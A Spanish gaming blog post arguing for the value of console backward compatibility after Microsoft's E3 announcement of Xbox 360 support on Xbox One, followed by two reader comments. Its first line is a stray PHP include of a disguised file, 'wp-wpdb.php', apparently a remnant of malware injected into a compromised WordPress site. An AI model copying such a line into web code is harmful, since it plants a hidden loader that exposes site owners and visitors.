if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); La importancia de la retrocompatibilidad – La Fortaleza de LeChuck

La importancia de la retrocompatibilidad

La ronda de conferencias del E3 de este año ha llegado a su fin, y no han sido pocas las sorpresas o noticias que las compañías nos han presentado durante el evento, para mí una de las mejores, o más sorprendentes, ha sido el anuncio de la retrocompatibilidad de la Xbox One con los juegos de Xbox 360.

Esta noticia no podía llegar en mejor momento, tras haber visto los juegos que saldrán a la venta durante el próximo año se puede decir casi con seguridad que el ciclo de vida de la generación pasada ha llegado a su fin debido a que la gran mayoría de los juegos que vienen solo estarán disponibles para la nueva generación.

xbox-one-retrocompatibilidad-e3

Esto supone que cualquier jugador que quiera probar los juegos durante su año de lanzamiento ha de ahorrar para pasarse a la nueva generación si no lo ha hecho ya y dejar atrás sus anteriores consolas que tan buenos ratos le ha dado, pero el motivo por el cual muchos jugadores no se han decidido a cambiar de generación hasta la fecha ha sido por el escaso catálogo que ha tenido la nueva generación durante sus primeros años de vida.

Está claro que siempre tenemos la opción de mantener ambas consolas y cambiarlas en cualquier momento, pero con el coste de las consolas y los planes renove no han sido pocos los jugadores que han vendido todo para que el cambiar de generación les sea más asequible.

Y aquí es donde la retrocompatibilidad toma un papel muy importante, hasta ahora estábamos acostumbrados a cambiar de consola pudiendo jugar a una gran selección de juegos de las generaciones pasadas dando mucha más vida útil a nuestros juegos sin que este cambio de consola nos afecte demasiado, pero en esta generación la cosa ha sido muy diferente, salvo la Wi iU que permite jugar a juegos de Wii ninguna de las otras consolas nos ha permitido seguir jugando con nuestros juegos viejos.

Esta generación ha estado marcada por un catálogo inicial muy escaso y lleno de retrasos, esto ha llevado a las compañías a suplir estos huecos con un recurso fácil y asequible, las famosas remasterizaciones, en algunos casos estas remasterizaciones han sido muy positivas para el juego ya que se ha añadido más contenido, se ha mejorado la jugabilidad y en contados casos se ha llevado el juego a otras plataformas para que más usuarios puedan jugarlo si en su día no pudieron, pero también hemos tenido otras tantas que no han sido otra cosa que un refrito con una pequeña mejora gráfica mediante un par de filtros para conseguir dinero fácil.

Este abuso de las remasterizaciones en 2014 hizo que el catálogo de Sony y Microsoft se llenasen de muchos refritos, y al no tener una retrocompatibilidad los jugadores teníamos poco entre lo que elegir. Que si, siempre podemos no comprar el juego y punto, pero si los estudios están destinando recursos y personal en hacer refritos en vez de apostar por nuevos juegos el usuario pierde gran parte de la confianza en las compañías y como me ha pasado a mi en alguna ocasión, se siente estafado.

Personalmente no estoy en contra de las remasterizaciones siempre y cuando ofrezcan una gran cantidad de mejoras y contenido que hagan que la experiencia de juego sea diferente en el buen sentido, si no me va a portar nada mas que un saldo negativo en la cartera prefiero comprar el juego en su plataforma original por mucho menos.

Es por todo esto por lo que creo que la retrocompatibilidad es una función muy importante en cualquier consola, por un lado se mantiene el interés del usuario durante los primeros años de vida en el caso de que no haya un ritmo de juegos tan constante como ha sido el caso y por otro lado se ofrece la posibilidad de poder jugar a cualquier juego de esta generación y la pasada en el caso de cambiarse de compañía, vale que no es tan lucrativo para las compañías pero es tremendamente beneficioso para los jugadores.

juegos-360-retrocompatibles

¿Qué es exactamente lo que ha presentado Microsoft en su conferencia? Lo que ha presentado Microsoft no es la simple retrocompatibilidad de meto el disco y a jugar, funciona mediante un sistema de consola virtual donde al meter el disco físico se inicia una descarga digital que instala el contenido del disco para poder jugarlo sin problemas, eso significa que necesitaremos una conexión a Internet para poder instalar los juegos.

Podremos acceder a las partidas guardadas de xbox 360 siempre y cuando las hayamos guardado previamente en la nube, en el caso de no tener nada guardado en la nube podemos hacer una copia del disco duro a la nube sin problemas, de la misma forma aquellas partidas que juguemos en Xbox One se guardarán en la nube para poder retomarlas en cualquier momento en una 360 o viceversa, además cualquier DLC que hayamos comprado con anterioridad estará disponible en la versión de One.

Pero aquí no acaba la historia, ya que Microsoft ha comentado que están trabajando para hacer posible el jugar en la One con cualquier jugador de 360, esto implica que uno puede estar jugando al multijugador del Mass Effect 3, por poner un ejemplo, en la One con otro jugador en la 360 sin que haya ningún tipo de problema, esto suena demasiado bien, veremos en que se queda.

Por el momento está en fase de pruebas y solo está disponible para los miembros del programa preview, además de que la lista de juegos retrocompatibles aún es muy pequeña y se espera que en 2016 haya unos 200 juegos disponibles (se pueden votar aquí los próximos), el juego que estemos jugando será exactamente el mismo que en su versión de 360, pero al estar corriendo en un sistema mas potente el juego mejora ligeramente como podéis ver en el vídeo que tenéis abajo.

Microsoft se ha marcado un buen tanto al ofrecer al usuario la oportunidad de jugar a los mejores juegos de la pasada generación y aunque pueda parecer una tontería esto le da un valor añadido a la consola ampliando en gran medida el catálogo o la posibilidad de que cualquier poseedor de una 360 no pierda todos sus juegos al pasarse a la nueva generación, personalmente estoy muy contento con esta decisión, aunque sigo pensando que viene algo tarde.

Por desgracia Sony tiene otra política y el sistema de retrocompatibilidad que piensa ofrecer con PS Now flaquea en bastantes sentidos, por el momento no creo que alquilar los juegos de forma digital sea la mejor forma de permitir al usuario jugar a juegos de la pasada generación, ya veremos que tal funciona el sistema cuando llegue a Europa ya que me gustaría rejugar el Demon’s Souls sin tener que comprarme una PlayStation 3.

2 comentarios

  1. Un gran acierto, de momento estoy disfrutando de Mass effect en One sin problemas. Espero que pronto llegue juegos como RDR, para volver a disfrutar como lo hice en su momento.

    1. RDR está actualmente como el más votado, así que seguro que llega. No creo que a Rockstar le importe, ya que puede encima revitalizar las ventas del juego. Creo que los que critican a MS no se dan cuenta de la importancia de la retrocompatibilidad, y para mí es la mejor noticia del E3.

Dejar un comentario